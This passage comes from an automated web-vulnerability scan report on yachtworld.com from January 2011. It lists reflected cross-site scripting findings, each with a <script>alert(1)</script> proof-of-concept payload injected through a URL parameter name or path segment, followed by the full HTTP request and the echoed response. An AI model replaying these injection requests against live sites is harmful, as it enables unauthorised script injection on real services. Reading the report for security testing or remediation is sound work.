VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:28 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Sep 2010 20:17:05 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:28 GMT
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2030806&boat_id=2030806&back=/core/boats/2007/Regulator-Center-Console-2030806/VA/United-Statesd8f87"><script>alert(1)</script>8d9b62f2e71&boat_id=2030806">
...[SNIP]...

3.156. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-Center-Console-2030806/VA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6888"><script>alert(1)</script>8b4250a20fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-Center-Console-2030806/VA/United-States?e6888"><script>alert(1)</script>8b4250a20fa=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Sep 2010 20:17:05 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?e6888"><script>alert(1)</script>8b4250a20fa=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2030806&boat_id=2030806&back=/core/boats/2007/Regulator-Center-Console-2030806/VA/United-States&boat_id=2030806">
...[SNIP]...

3.157. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d5c"><script>alert(1)</script>fd63f2294c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Classic-2250145/Babylon72d5c"><script>alert(1)</script>fd63f2294c2/NY/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:47 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 27 Jan 2011 17:33:34 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:47 GMT
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
